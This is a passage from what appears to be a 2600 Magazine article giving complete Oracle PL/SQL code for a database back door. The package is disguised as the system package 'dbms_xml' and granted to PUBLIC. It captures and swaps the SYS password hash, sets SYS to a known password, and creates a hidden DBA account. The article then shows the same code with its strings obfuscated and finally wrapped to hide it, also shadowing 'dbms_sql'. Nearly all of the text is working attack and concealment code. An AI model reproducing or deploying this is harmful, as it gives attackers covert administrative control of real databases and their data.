Continued from 2600 Magazine - A Back Door To Your Oracle Database

Part 2: Obfuscation of the String Literals then Wrapping the Code

Below is a listing of the code of DBMS_XML as it appears in the 2600 Magazine article:

CREATE OR REPLACE PACKAGE dbms_xml AS
 PROCEDURE parse (string IN VARCHAR2);
END dbms_xml;

/

CREATE OR REPLACE PACKAGE BODY dbms_xml AS
PROCEDURE parse (string IN VARCHAR2) IS
var1 VARCHAR2 (100);
BEGIN

IF string = 'unlock' THEN
 SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
 EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
 EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
 COMMIT;
 EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY hack11hack';
END IF;

IF string = 'lock' THEN
 EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
 EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
 EXECUTE IMMEDIATE 'DROP TABLE syspa1';
END IF;

IF string = 'make' THEN
 EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY hack11hack';
 EXECUTE IMMEDIATE 'GRANT DBA TO hill';
END IF;

IF string = 'unmake' THEN
 EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
END IF;

END;

END dbms_xml;

/

CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;
GRANT EXECUTE ON dbms_xml TO PUBLIC;

The code below demonstrates how to obfuscate the text strings using the translate function:

CREATE OR REPLACE PACKAGE dbms_xml
AS
   PROCEDURE parse (STRING IN VARCHAR2);
END dbms_xml;
/

CREATE OR REPLACE PACKAGE BODY dbms_xml
AS
   PROCEDURE parse (STRING IN VARCHAR2)
   IS
      var1   VARCHAR2 (100);
      /* ------- sub function begin ------- */
      FUNCTION conv (input IN VARCHAR2)
         RETURN VARCHAR2
      IS
         x   VARCHAR2 (300);
      BEGIN
         x :=
            TRANSLATE (input,
                       'ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 ',
                       ' 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
                      );
         RETURN x;
      EXCEPTION
         WHEN OTHERS
         THEN
            RETURN NULL;
      END conv;
   /* ------- sub function end ------- */
   BEGIN
      IF STRING = 'unlock'
      THEN
         EXECUTE IMMEDIATE conv ('7kdkm6Z0o773a8lZj8acZLMO_uwKxwZ3hk8kZuwKxBOCKZ=Z''717''') 
              INTO var1;
         EXECUTE IMMEDIATE conv ('NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP))');
         EXECUTE IMMEDIATE conv ('GBwKxvZGBvAZwqwzOYZtODuKwZ(''') || var1 || ''')';
         COMMIT;
         var1:= conv ('od6k8Z57k8Z717Zglkb6gjgklZn1ZHONEYYHONE');
         EXECUTE IMMEDIATE var1;
      END IF;

      IF STRING = 'lock'
      THEN
         EXECUTE IMMEDIATE conv ('7kdkm6ZNADYZj8acZwqwzOYZ3hk8kZ8a3b5c=Y') INTO var1;
         EXECUTE IMMEDIATE conv ('od6k8Z57k8Z717Zglkb6gjgklZn1Z4od5k7Z''') || var1 || '''';
         EXECUTE IMMEDIATE conv ('l8a0Z6ondkZwqwzOY');
      END IF;

      IF STRING = 'make'
      THEN
         EXECUTE IMMEDIATE conv ('m8ko6kZ57k8ZHGDDZglkb6gjgklZn1ZHONEYYHONE');
         EXECUTE IMMEDIATE conv ('i8ob6ZlnoZ6aZHGDD');
      END IF;

      IF STRING = 'unmake'
      THEN
         EXECUTE IMMEDIATE conv ('l8a0Z57k8ZHGDDZmo7molk');
      END IF;
   END;
END dbms_xml;
/
create public synonym dbms_sql for dbms_xml;
grant execute on dbms_xml to public;

The code below has has been modified by the WRAP utility. Now, it is very difficult to understand it, and impossible to edit it.

CREATE OR REPLACE PACKAGE dbms_xml wrapped 
0
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
3
9
9000000
1
4
0 
5
2 :e:
1PACKAGE:
1DBMS_XML:
1PARSE:
1STRING:
1VARCHAR2:
0

0
0
13
2
0 a0 97 9a 8f a0 b0 3d
b4 55 6a a0 :2 aa 59 58 1d
17 b5 
13
2
0 3 7 11 2d 29 28 35
25 3a 3e 42 46 48 4a 4d
50 51 5a 
13
2
0 1 9 e 15 1f :2 15 14
:2 4 5 :7 1 
13
4
0 :2 1 :8 3 4
:7 1 
5c
4
:3 0 1 :3 0 2
:6 0 1 :2 0 3
:a 0 a 2 :7 0
5 :2 0 3 5
:3 0 4 :7 0 6
5 :3 0 8 :2 0
a 3 9 0
c 2 :3 0 7
e 0 e c
d f 2 e
11 0 10 f
12 :8 0 
9
4
:3 0 1 4 1
7 1 a 
1
4
0 
11
0
1
14
2
3
0 1 0 0 0 0 0 0
0 0 0 0 0 0 0 0
0 0 0 0 
2 0 1
3 1 2
4 2 0
0

/
CREATE OR REPLACE PACKAGE BODY dbms_xml wrapped 
0
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
3
b
9000000
1
4
0 
27
2 :e:
1PACKAGE:
1BODY:
1DBMS_XML:
1PARSE:
1STRING:
1VARCHAR2:
1VAR1:
1100:
1FUNCTION:
1CONV:
1INPUT:
1RETURN:
1X:
1300:
1TRANSLATE:
1ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 :
1 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ:
1OTHERS:
1=:
1unlock:
1EXECUTE:
1IMMEDIATE:
17kdkm6Z0o773a8lZj8acZLMO_uwKxwZ3hk8kZuwKxBOCKZ=Z'717':
1NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP)):
1GBwKxvZGBvAZwqwzOYZtODuKwZ(':
1||:
1'):
1COMMIT:
1od6k8Z57k8Z717Zglkb6gjgklZn1ZHONEYYHONE:
1lock:
17kdkm6ZNADYZj8acZwqwzOYZ3hk8kZ8a3b5c=Y:
1od6k8Z57k8Z717Zglkb6gjgklZn1Z4od5k7Z':
1':
1l8a0Z6ondkZwqwzOY:
1make:
1m8ko6kZ57k8ZHGDDZglkb6gjgklZn1ZHONEYYHONE:
1i8ob6ZlnoZ6aZHGDD:
1unmake:
1l8a0Z57k8ZHGDDZmo7molk:
0

0
0
da
2
0 :2 a0 97 9a 8f a0 b0 3d
b4 55 6a a3 a0 51 a5 1c
81 b0 a0 8d 8f a0 b0 3d
b4 :2 a0 2c 6a a3 a0 51 a5
1c 81 b0 :3 a0 :2 6e a5 b d
:2 a0 65 b7 a0 53 a0 4d 65
b7 a6 9 a4 a0 b1 11 68
4f a0 7e 6e b4 2e :3 a0 6e
a5 b a0 11e 11d :3 a0 6e a5
b 11e 11d :3 a0 6e a5 b 7e
a0 b4 2e 7e 6e b4 2e 11e
11d a0 57 a0 b4 e9 :2 a0 6e
a5 b d :3 a0 11e 11d b7 19
3c a0 7e 6e b4 2e :3 a0 6e
a5 b a0 11e 11d :3 a0 6e a5
b 7e a0 b4 2e 7e 6e b4
2e 11e 11d :3 a0 6e a5 b 11e
11d b7 19 3c a0 7e 6e b4
2e :3 a0 6e a5 b 11e 11d :3 a0
6e a5 b 11e 11d b7 19 3c
a0 7e 6e b4 2e :3 a0 6e a5
b 11e 11d b7 19 3c b7 a4
b1 11 68 4f b1 b7 a4 11
a0 b1 56 4f 1d 17 b5 
da
2
0 3 7 b 15 31 2d 2c
39 29 3e 42 5f 4a 4e 51
52 5a 49 66 6a 86 82 46
8e 81 93 97 9b 9f b9 a7
7e ab ac b4 a6 c0 c4 c8
cc d1 a3 d6 d8 dc e0 e4
e8 ea 1 ee f2 f3 f7 f9
fa ff 103 107 109 115 119 11b
11f 122 127 128 12d 131 135 139
13e 13f 141 145 14a 14e 152 156
15a 15f 160 162 167 16b 16f 173
177 17c 17d 17f 182 186 187 18c
18f 194 195 19a 19f 1a3 1a7 1ac
1b0 1b1 1b6 1ba 1be 1c3 1c4 1c6
1ca 1ce 1d2 1d6 1db 1df 1e1 1e5
1e8 1ec 1ef 1f4 1f5 1fa 1fe 202
206 20b 20c 20e 212 217 21b 21f
223 227 22c 22d 22f 232 236 237
23c 23f 244 245 24a 24f 253 257
25b 25f 264 265 267 26c 270 272
276 279 27d 280 285 286 28b 28f
293 297 29c 29d 29f 2a4 2a8 2ac
2b0 2b4 2b9 2ba 2bc 2c1 2c5 2c7
2cb 2ce 2d2 2d5 2da 2db 2e0 2e4
2e8 2ec 2f1 2f2 2f4 2f9 2fd 2ff
303 306 308 30c 30e 31a 31e 320
322 324 328 334 338 33a 33d 33f
340 349 
da
2
0 1 9 :2 e 15 1f :2 15 14
:2 4 7 e 18 17 :2 e :2 7 10
16 1f :2 16 15 a 11 :2 7 a
e 18 17 :2 e :2 a d :3 18 :2 d
:2 a 11 a 7 :2 f d 14 d
:3 a 7 b :4 7 a 11 13 :2 11
a 12 1c 22 :2 1c 62 :3 a 12
1c 22 :2 1c :3 a 12 1c 22 :2 1c
43 46 :2 1c 4b 4e :2 1c :7 a 4
b 11 :2 b 4 a 12 1c :2 a
:3 7 a 11 13 :2 11 a 12 1c
22 :2 1c 51 :3 a 12 1c 22 :2 1c
4c 4f :2 1c 54 57 :2 1c :3 a 12
1c 22 :2 1c :2 a :3 7 a 11 13
:2 11 a 12 1c 22 :2 1c :3 a 12
1c 22 :2 1c :2 a :3 7 a 11 13
:2 11 a 12 1c 22 :2 1c :2 a :3 7
:a 4 5 :6 1 
da
4
0 :3 1 :8 3 :7 5
:7 7 :2 8 :2 7 :7 a
c :2 d e f
:2 d c :3 11 b
:2 13 :3 15 14 :2 13
12 16 :4 7 :5 19
:9 1b :8 1c :10 1d :5 1e
:6 1f :5 20 1a :2 19
:5 23 :9 25 :10 26 :8 27
24 :2 23 :5 2a :8 2c
:8 2d 2b :2 2a :5 30
:8 32 31 :2 30 :2 18
:8 3 35 :6 1 
34b
4
:3 0 1 :3 0 2
:3 0 3 :6 0 1
:2 0 4 :a 0 cd
2 :7 0 5 :2 0
3 6 :3 0 5
:7 0 7 6 :3 0
9 :2 0 cd 4
a :2 0 b 7e
0 9 6 :3 0
8 :2 0 7 d
f :6 0 12 10
0 cb 0 7
:6 0 9 :3 0 a
:a 0 3d 3 :7 0
e :2 0 d 6
:3 0 b :7 0 17
16 :3 0 c :3 0
6 :3 0 19 1b
0 3d 14 1c
:2 0 13 :2 0 11
6 :3 0 f 1f
21 :6 0 24 22
0 3b 0 d
:6 0 d :3 0 f
:3 0 b :3 0 10
:4 0 11 :4 0 26
2a 25 2b 0
30 c :3 0 d
:3 0 2e :2 0 30
17 3c 12 :3 0
c :4 0 34 :2 0
36 1a 38 1c
37 36 :2 0 39
1e :2 0 3c a
:3 0 20 3c 3b
30 39 :6 0 3d
2 0 14 1c
3c cb :2 0 5
:3 0 13 :2 0 14
:4 0 24 40 42
:3 0 15 :3 0 16
:3 0 a :3 0 17
:4 0 27 46 48
7 :3 0 49 4a
:3 0 4b :2 0 75
15 :3 0 16 :3 0
a :3 0 18 :4 0
29 4f 51 52
:4 0 53 :2 0 75
15 :3 0 16 :3 0
a :3 0 19 :4 0
2b 57 59 1a
:2 0 7 :3 0 2d
5b 5d :3 0 1a
:2 0 1b :4 0 30
5f 61 :3 0 62
:4 0 63 :2 0 75
1c :3 0 67 68
:2 0 69 1c :5 0
66 :2 0 75 7
:3 0 a :3 0 1d
:4 0 33 6b 6d
6a 6e 0 75
15 :3 0 16 :3 0
7 :3 0 72 :4 0
73 :2 0 75 35
76 43 75 0
77 3c 0 c9
5 :3 0 13 :2 0
1e :4 0 40 79
7b :3 0 15 :3 0
16 :3 0 a :3 0
1f :4 0 43 7f
81 7 :3 0 82
83 :3 0 84 :2 0
9e 15 :3 0 16
:3 0 a :3 0 20
:4 0 45 88 8a
1a :2 0 7 :3 0
47 8c 8e :3 0
1a :2 0 21 :4 0
4a 90 92 :3 0
93 :4 0 94 :2 0
9e 15 :3 0 16
:3 0 a :3 0 22
:4 0 4d 98 9a
9b :4 0 9c :2 0
9e 4f 9f 7c
9e 0 a0 53
0 c9 5 :3 0
13 :2 0 23 :4 0
57 a2 a4 :3 0
15 :3 0 16 :3 0
a :3 0 24 :4 0
5a a8 aa ab
:4 0 ac :2 0 b6
15 :3 0 16 :3 0
a :3 0 25 :4 0
5c b0 b2 b3
:4 0 b4 :2 0 b6
5e b7 a5 b6
0 b8 61 0
c9 5 :3 0 13
:2 0 26 :4 0 65
ba bc :3 0 15
:3 0 16 :3 0 a
:3 0 27 :4 0 68
c0 c2 c3 :4 0
c4 :2 0 c6 6a
c7 bd c6 0
c8 6c 0 c9
6e cc :3 0 cc
73 cc cb c9
ca :6 0 cd 1
0 4 a cc
d4 :3 0 d2 0
d2 :3 0 d2 d4
d0 d1 :6 0 d5
:2 0 3 :3 0 76
0 3 d2 d8
:3 0 d7 d5 d9
:8 0 
78
4
:3 0 1 5 1
8 1 e 1
c 1 15 1
18 1 20 1
1e 3 27 28
29 2 2c 2f
1 35 1 32
1 38 1 23
1 41 2 3f
41 1 47 1
50 1 58 2
5a 5c 2 5e
60 1 6c 6
4c 54 64 69
6f 74 1 76
1 7a 2 78
7a 1 80 1
89 2 8b 8d
2 8f 91 1
99 3 85 95
9d 1 9f 1
a3 2 a1 a3
1 a9 1 b1
2 ad b5 1
b7 1 bb 2
b9 bb 1 c1
1 c5 1 c7
4 77 a0 b8
c8 2 11 3d
1 cd 
1
4
0 
d8
0
1
14
3
7
0 1 2 0 0 0 0 0
0 0 0 0 0 0 0 0
0 0 0 0 
c 2 0
3 0 1
4 1 2
15 3 0
5 2 0
1e 3 0
14 2 3
0

/

create public synonym dbms_xml for dbms_xml;
grant execute on dbms_xml to public;

Return to $2600 Index